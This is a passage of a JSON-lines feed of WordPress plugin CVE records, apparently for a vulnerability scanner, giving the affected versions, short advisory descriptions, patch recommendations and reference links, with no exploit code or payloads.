ings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242626\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-category-management\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-category-management\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d42ca2f-f061-4cd1-812b-46d42c440498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d42ca2f-f061-4cd1-812b-46d42c440498?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8050","slug":"custom-author-base","versionImpact":"1.1.1","description":"The Custom Author Base WordPress plugin through 1.1.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28c9c127-464a-4750-8b62-a9b90b01f1af\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28c9c127-464a-4750-8b62-a9b90b01f1af\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6739","slug":"wpquiz","versionImpact":"0.4.2","description":"The WPQuiz plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'wpquiz' shortcode in all versions up to, and including, 0.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpquiz\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpquiz\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16444905-b111-4b4f-a9f0-d8728da2ebfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16444905-b111-4b4f-a9f0-d8728da2ebfb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0075","slug":"amazonjs","versionImpact":"0.10","description":"The Amazon JS WordPress plugin through 0.10 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/097acd6f-3291-4cdc-a054-4432b6350411\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/097acd6f-3291-4cdc-a054-4432b6350411\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1869","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrative-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a81d5615-0b96-4d89-a525-7e80a10a9317?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a81d5615-0b96-4d89-a525-7e80a10a9317?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3055","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_save' function. This makes it possible for unauthenticated attackers to update the post content and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efeffa2-b21a-4aa1-93b0-51c775758ab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efeffa2-b21a-4aa1-93b0-51c775758ab1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2721\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2721\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0489","slug":"slideonline","versionImpact":"1.2.1","description":"The SlideOnline WordPress plugin through 1.2.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/238842ee-6392-4eb2-96cb-08e4ece6fca1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/238842ee-6392-4eb2-96cb-08e4ece6fca1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6738","slug":"pagelayer","versionImpact":"1.7.8","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pagelayer_header_code', 'pagelayer_body_open_code', and 'pagelayer_footer_code' meta fields in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This appears to be a reintroduction of a vulnerability patched in version 1.7.7.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d14c8890-482c-4d43-a68f-0d04c4feca8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d14c8890-482c-4d43-a68f-0d04c4feca8f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/trunk\\\/main\\\/post_metas.php#L527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/trunk\\\/main\\\/post_metas.php#L527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/pagelayer\\\/tags\\\/1.7.8&old=3016486&new_path=\\\/pagelayer\\\/tags\\\/1.7.9&new=3016486&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/pagelayer\\\/tags\\\/1.7.8&old=3016486&new_path=\\\/pagelayer\\\/tags\\\/1.7.9&new=3016486&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0978","slug":"jonradio-private-site","versionImpact":"3.0.14","description":"The My Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.14 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's site privacy feature and view restricted page and post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970bc71c-7d0a-4761-874a-379cda71418e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970bc71c-7d0a-4761-874a-379cda71418e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036015\\\/jonradio-private-site\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036015\\\/jonradio-private-site\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0780","slug":"enjoy-instagram-instagram-responsive-images-gallery-and-carousel","versionImpact":"6.2.2","description":"The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation when resetting its database, allowing any authenticated users, such as subscriber to perform such action","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be3045b1-72e6-450a-8dd2-4702a9328447\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be3045b1-72e6-450a-8dd2-4702a9328447\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5601","slug":"mediavine-create","versionImpact":"1.9.7","description":"The Create by Mediavine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Schema Meta shortcode in all versions up to, and including, 1.9.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d04d8c1-75c0-447c-a26a-c2724c0a6618?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d04d8c1-75c0-447c-a26a-c2724c0a6618?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediavine-create\\\/trunk\\\/class-plugin.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediavine-create\\\/trunk\\\/class-plugin.php#L575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108144\\\/#file794\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108144\\\/#file794\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5582","slug":"schema-and-structured-data-for-wp","versionImpact":"1.33","description":"The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'url' attribute within the Q&A Block widget in all versions up to, and including, 1.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab650b99-ab15-4ddc-a622-cb43ab554ba7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab650b99-ab15-4ddc-a622-cb43ab554ba7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.31\\\/modules\\\/elementor\\\/widgets\\\/qanda-block.php#L355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.31\\\/modules\\\/elementor\\\/widgets\\\/qanda-block.php#L355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/class-qanda-block.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/class-qanda-block.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-and-structured-data-for-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-and-structured-data-for-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10374","slug":"wp-members","versionImpact":"3.4.9.5","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpmem_loginout shortcode in all versions up to, and including, 3.4.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ea93a49-0e1a-4a24-8f6b-03e624f517d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ea93a49-0e1a-4a24-8f6b-03e624f517d4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172530\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172530\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9615","slug":"bulkpress","versionImpact":"0.3.5","description":"The BulkPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.3.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbce4588-fbd2-4b75-8f67-51c7d02892be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbce4588-fbd2-4b75-8f67-51c7d02892be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulkpress\\\/trunk\\\/lib\\\/classes\\\/AdminMenuPage\\\/class.Abstract.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulkpress\\\/trunk\\\/lib\\\/classes\\\/AdminMenuPage\\\/class.Abstract.php#L221\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10952","slug":"authors-list","versionImpact":"2.0.4","description":"The The Authors List plugin for WordPress is vulnerable to arbitrary shortcode execution via update_authors_list_ajax AJAX action in all versions up to, and including, 2.0.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authors-list\\\/tags\\\/2.0.4\\\/backend\\\/includes\\\/class-authors-list-item.php#L843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authors-list\\\/tags\\\/2.0.4\\\/backend\\\/includes\\\/class-authors-list-item.php#L843\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/authors-list\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/authors-list\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b3cfe0a-dcfb-40f3-ba43-4e838c113010?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b3cfe0a-dcfb-40f3-ba43-4e838c113010?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpkube.com\\\/\",\"name\":\"https:\\\/\\\/www.wpkube.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11869","slug":"buk-appointments","versionImpact":"1.0.7","description":"The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buk-appointments\\\/trunk\\\/buk.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buk-appointments\\\/trunk\\\/buk.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buk-appointments\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buk-appointments\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12126","slug":"seo-keywords","versionImpact":"1.1.3","description":"The SEO Keywords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018google_error\u2019 parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-keywords\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-keywords\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/325c2350-174b-4117-bacd-ae28bf3b16bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/325c2350-174b-4117-bacd-ae28bf3b16bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13854","slug":"education-addon","versionImpact":"1.3.1","description":"The Education Addon for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.1 via the naedu_elementor_template shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract information from posts that are not public, including drafts, password protected, and restricted posts. This applies to posts created with Elementor only.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/education-addon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/education-addon\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50e8811c-07b1-4325-92a4-dc1c91afbe9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50e8811c-07b1-4325-92a4-dc1c91afbe9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13868","slug":"easy-broken-link-checker","versionImpact":"9.0.2","description":"The URL Shortener | Conversion Tracking  | AB Testing  | WooCommerce WordPress plugin through 9.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bff1645-dd53-4416-a90f-7cf4a6b33c1a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bff1645-dd53-4416-a90f-7cf4a6b33c1a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8032","slug":"smooth-gallery-replacement","versionImpact":"1.0","description":"The Smooth Gallery Replacement WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c9120b1-ca81-411b-a2e2-a8d30f32a74b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c9120b1-ca81-411b-a2e2-a8d30f32a74b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6729","slug":"woocommerce-paymaster-gateway-019","versionImpact":"0.4.31","description":"The PayMaster for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.4.31 via the 'wp_ajax_paym_status' AJAX action This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-paymaster-gateway-019\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-paymaster-gateway-019\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b9b501e-2ce7-43d8-bad2-6c3176eed8e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b9b501e-2ce7-43d8-bad2-6c3176eed8e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1868","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check when clearing the plugin cache via the yrc_clear_cache GET parameter in versions up to, and including, 1.2.3. This makes it possible for unauthenticated attackers to clear the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/541d202b-f3ed-44d8-93a6-e158209db885?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/541d202b-f3ed-44d8-93a6-e158209db885?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L768\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L768\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3053","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'azh_add_post' function in versions up to, and including, 1.27.133. This makes it possible for authenticated attackers to create a post with any post type and post status.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd56cb73-1c40-44b1-b713-c0291832d988?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd56cb73-1c40-44b1-b713-c0291832d988?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0368","slug":"responsive-tabs-for-wpbakery","versionImpact":"1.1","description":"The Responsive Tabs For WPBakery Page Builder (formerly Visual Composer) WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b41e5c09-1034-48a7-ac0f-d4db6e7a3b3e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b41e5c09-1034-48a7-ac0f-d4db6e7a3b3e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6733","slug":"wp-members","versionImpact":"3.4.8","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.8 via the wpmem_field shortcode. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including user emails, password hashes, usernames, and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46c61f38-553e-43b2-a666-b160db40e66d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46c61f38-553e-43b2-a666-b160db40e66d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3015224%40wp-members%2Ftrunk&old=2920897%40wp-members%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3015224%40wp-members%2Ftrunk&old=2920897%40wp-members%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0907","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.5.6","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the restore_records() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to restore records.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.